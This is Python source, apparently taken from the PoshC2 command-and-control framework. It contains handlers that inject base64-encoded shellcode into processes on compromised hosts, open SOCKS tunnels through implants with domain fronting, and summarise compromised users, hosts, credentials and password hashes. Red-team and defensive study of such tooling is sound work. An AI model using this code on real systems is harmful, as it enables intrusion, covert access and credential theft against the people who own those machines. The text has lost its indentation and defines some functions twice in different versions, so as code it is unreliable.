def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "C#":
path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory,
daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
new_task(
"run-exe Core.Program Core Inject-Shellcode %s%s #%s" %
(base64.b64encode(shellcodefile).decode("utf-8"), params,
os.path.basename(path)), user, randomuri)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "PS":
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory,
arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (
PoshProjectDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (
PoshProjectDirectory, arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task(
"$Shellcode%s=\"%s\" #%s" %
(arch, base64.b64encode(shellcodefile).decode("utf-8"),
os.path.basename(path)), user, randomuri)
new_task(
"Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s"
% (arch, params), user, randomuri)
def do_sharpsocks(user, command, randomuri):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = select_item("PayloadCommsHost", "C2Server")
sharpport = select_item("PayloadCommsPort", "C2Server")
dfheader = select_item("DomainFrontHeader", "C2Server")
implant = get_implantdetails(randomuri)
pivot = implant[15]
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
if (sharpport != 80 and sharpport != 443):
if (sharpurl.count("/") >= 3):
pat = re.compile(r"(?<!/)/(?!/)")
sharpurl = pat.sub(":%s/" % sharpport, str, 1)
else:
sharpurl = ("%s:%s" % (sharpurl, sharpport))
print(PoshInstallDirectory + "resources/SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
def do_opsec(user, command):
implants = get_implants_all()
comtasks = get_tasks()
hosts = ""
uploads = ""
urls = ""
users = ""
for i in implants:
if i[3] not in hosts:
hosts += "%s \n" % i[3]
if i[9] not in urls:
urls += "%s \n" % i[9]
for t in comtasks:
hostname = get_implantdetails(t[1])
command = t[2].lower()
output = t[3].lower()
if hostname[2] not in users:
users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3])
if "invoke-pbind" in command and "connected" in output:
tg = re.search("(?<=-target )\\S*", str(command))
if tg[0] not in hosts:
hosts += "%s \n" % tg[0]
if "uploading file" in command:
uploadedfile = command
uploadedfile = uploadedfile.partition(
"uploading file: ")[2].strip()
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
uploadedfile = uploadedfile.strip('"')
uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)
if "installing persistence" in output:
implant_details = get_implantdetails(t[2])
line = command.replace('\n', '')
line = line.replace('\r', '')
filenameuploaded = line.rstrip().split(":", 1)[1]
uploads += "%s %s \n" % (implant_details[3], filenameuploaded)
if "written scf file" in output:
implant_details = get_implantdetails(t[2])
uploads += "%s %s\n" % (implant_details[3],
output[output.indexof(':'):])
creds, hashes = parse_creds(get_creds())
print_good(
"\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
% (users, hosts, urls, uploads, creds, hashes))
input("Press Enter to continue...")
clear()
def do_kill_implant(user, command, randomuri):
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
def do_tasks(user, command):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
print_good("No tasks queued!\r\n")
else:
for task in tasks:
imname = get_implantdetails(task[1])
alltasks += "[%s] : %s | %s\r\n" % (imname[0], "%s\\%s" % (imname[11], imname[2]), task[2])
print_good("Queued tasks:\r\n\r\n%s" % alltasks)
input("Press Enter to continue...")
clear()
def do_modulesloaded(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details[14])
new_task("listmodules", user, randomuri)
def do_modulesloaded(user, command, randomuri):
ml = get_implantdetails(randomuri)
print(ml[14])
def do_get_pid(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details[8])